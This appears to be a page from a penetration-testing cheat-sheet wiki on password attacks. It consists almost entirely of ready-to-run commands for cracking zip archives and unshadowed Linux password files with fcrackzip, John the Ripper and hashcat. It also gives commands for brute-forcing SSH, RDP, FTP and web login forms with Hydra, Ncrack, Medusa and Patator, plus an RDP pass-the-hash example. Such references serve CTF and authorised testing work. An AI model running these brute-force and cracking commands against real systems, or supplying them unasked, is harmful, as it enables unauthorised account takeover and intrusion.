Password Attacks



=======================Fcrackzip : 
>>> fcrackzip -u -D -p ‘rockyou.txt’ zip_file


=======================Jonny : 
>>> john --format=zip hash.txt
>>> zip2john zip_file > hash.txt
>>> unshadow passwd.txt shadow.txt > creds.txt
>>> john --wordlist=rockyou.txt creds.txt 


=======================HYDRA : 
>>> hydra -l username -P password_list IP_ADDR -V http-post-form ‘/path login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location’ -t 25
>>> hydra -l user -P /usr/share/wordlists/password/rockyou.txt -e s ssh://10.10.1.111 -I
>>> hashcat -a 0 -m <hash-mode> hash.txt rockyou.txt
>>> hydra -l <username> -P <wordlist> 192.168.2.62 http-post-form <path>:<body>:<fail_message>
EG.>>> hydra -l james -P wordlist.txt 10.10.156.130 http-post-form "/api/user/login:username=^USER^&password=^PASS^:Invalid Username Or Password"
>>> hydra 10.0.0.1 http-post-form "/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid" -P /usr/share/wordlists/rockyou.txt -l admin


=====================Ncrack : 
SSH>>> ncrack -u testuser -P wordlist.txt <host> -p 22
RDP>>> ncrack -u testuser -P wordlist.txt <host> -p 3389
FTP>>> ncrack -u testuser -P wordlist.txt <host> -p 21

=====================Medusa=======================================
Note : Login brute-forcer tool designed to be speedy, parallel and modular.
It supports many protocols: AFP, CVS, FTP, HTTP, IMAP, rlogin, SSH, Subversion, and VNC to name a few.

>>> medusa -u testuser -P wordlist.txt -h <host> -M ssh
>>> medusa -h <host> -u ignite -P pass.txt -M ftp
>>> medusa -h <host> -U users.txt -p 123 -M ftp
>>> medusa -h <host> -U users.txt -P pass.txt -M ftp
>>> medusa -H hosts.txt -U user.txt -P pass.txt -M ftp
>>> medusa -h <host> -U users.txt -P pass.txt -M ssh -n 2222
>>> medusa -h <host> -u ignite -P pass.txt -M ftp -O log.txt
>>> medusa -H hosts.txt -U users.txt -P pass.txt -M ftp -v

RDP (pass-the-hash):
>>> medusa -M rdp -m PASS:HASH -h <host> -u someuser -p <NTLM_hash>
================================================================

=======================PATADOR The Evil Brute Forcer : 
Link : https://github.com/lanjelot/patator
>>> patator ftp_login host=$IP user=someUser password=FILE0 0=wordlist.txt
>>> patator ssh_login host=10.10.0.1 user=someUser password=FILE0 0=wordlist.txt
PreviousSpawn a Bash shell for me NextPORT FORWARDING / TUNNELING
Last updated 2 years ago